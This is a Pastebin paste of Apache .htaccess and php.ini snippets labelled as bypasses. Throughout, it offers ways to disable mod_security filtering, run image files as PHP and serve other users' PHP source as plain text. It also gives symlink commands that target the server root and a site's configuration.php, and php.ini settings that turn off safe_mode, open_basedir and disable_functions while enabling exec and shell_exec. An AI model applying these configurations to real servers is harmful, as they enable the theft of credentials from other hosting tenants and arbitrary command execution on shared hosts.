Advertisement
silvestre7

htaccess bypass

Sep 1st, 2017
1,211
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1. - [ Bypass Directory ]-
  2. <Directory "/home/user/public_html">
  3. Options -ExecCGI
  4. AllowOverride AuthConfig Indexes Limit FileInfo
  5. options=IncludesNOEXEC,Indexes,Includes,Multi
  6. Views ,SymLinksIfOwnerMatch,FollowSymLinks
  7. </Directory>
  8. - [ Ext Changer ]-
  9. AddHandler application/x-httpd-php .jpg .php
  10. - [ Run SSL ]-
  11. AddType text/html .shtml
  12. AddOutputFilter INCLUDES .shtml
  13. - [ Bypass Safe 400 ]-
  14. Options +Includes
  15. AddType text/html .shtml
  16. AddHandler server-parsed .shtml
  17. - [ Bypass Safe Mode ]-
  18. Options +FollowSymLinks
  19. DirectoryIndex ssssss.htm
  20. Options All Indexes
  21. <IfModule mod_security.c>
  22. SecFilterEngine Off
  23. SecFilterScanPOST Off
  24. SecFilterCheckURLEncoding Off
  25. SecFilterCheckCookieFormat Off
  26. SecFilterCheckUnicodeEncoding Off
  27. SecFilterNormalizeCookies Off
  28. </IfModule>
  29. SetEnv PHPRC /home/user/public_html/php.ini
  30. suPHP_ConfigPath /home/user/public_html/php.ini
  31. - [ Bypass Symlink1 ]-
  32. Options All
  33. Options +FollowSymLinks +Indexes
  34. DirectoryIndex default.html
  35. AddType text/html php
  36. - [ Bypass Symlink2 ]-
  37. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  38. AddHandler txt .php
  39. AddHandler cgi-script .cgi
  40. AddHandler cgi-script .pl
  41. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  42. Options Indexes FollowSymLinks
  43. AddType txt .php
  44. AddType text/html .shtml
  45. Options All
  46. Options All
  47. - [ Bypass Symlink 500 ]-
  48. Options Indexes FollowSymLinks
  49. DirectoryIndex d3g1d5.htm
  50. AddType txt .php
  51. AddHandler txt .php
  52. - [ Bypass Modsec ]-
  53. <IfModule mod_security.c>
  54. SecFilterEngine Off
  55. SecFilterScanPOST Off
  56. </IfModule>
  57. - [ Include symlink ]-
  58. Options Indexes FollowSymLinks
  59. DirectoryIndex ssssss.htm
  60. AddType txt .php
  61. AddHandler txt .php
  62. - [ Bypass Litespeed ] -
  63. wew.shtml
  64. do ==> ln -ls /home/user/public_html/
  65. configuration.php wew.shtml
  66. .htaccess
  67. Options +FollowSymLinks
  68. DirectoryIndex chesss.html
  69. RemoveHandler .php
  70. AddType application/octet-stream .php
  71. - [ Bypass OVH ]-
  72. .htaccess
  73. Options +FollowSymLinks
  74. DirectoryIndex Index.html
  75. Options +Indexes
  76. AddType text/plain .php
  77. AddHandler server-parsed .php
  78. AddType root .root
  79. AddHandler cgi-script .root
  80. AddHandler cgi-script .root
  81. php.ini
  82. safe_mode = Off
  83. disable_functions =
  84. safe_mode_gid = Off
  85. open_basedir = Off
  86. register_globals = on
  87. exec = On
  88. shell_exec = On
  89. ln -s / CoderSec
  90. - [ Bypass Symlink 403 forbidden ] -
  91. .htaccess
  92. Options all
  93. DirectoryIndex Sux.html
  94. AddType text/plain .php
  95. AddHandler server-parsed .php
  96. AddType text/plain .html
  97. AddHandler txt .html
  98. Require None
  99. Satisfy Any
  100. Bypass symlink via .htaccess
  101. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  102. AddHandler txt .php
  103. AddHandler cgi-script .cgi
  104. AddHandler cgi-script .pl
  105. OPTIONS Indexes Includes ExecCGI FollowSymLinks
  106. Options Indexes FollowSymLinks
  107. AddType txt .php
  108. AddType text/html .shtml
  109. Options All
  110. Options All
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement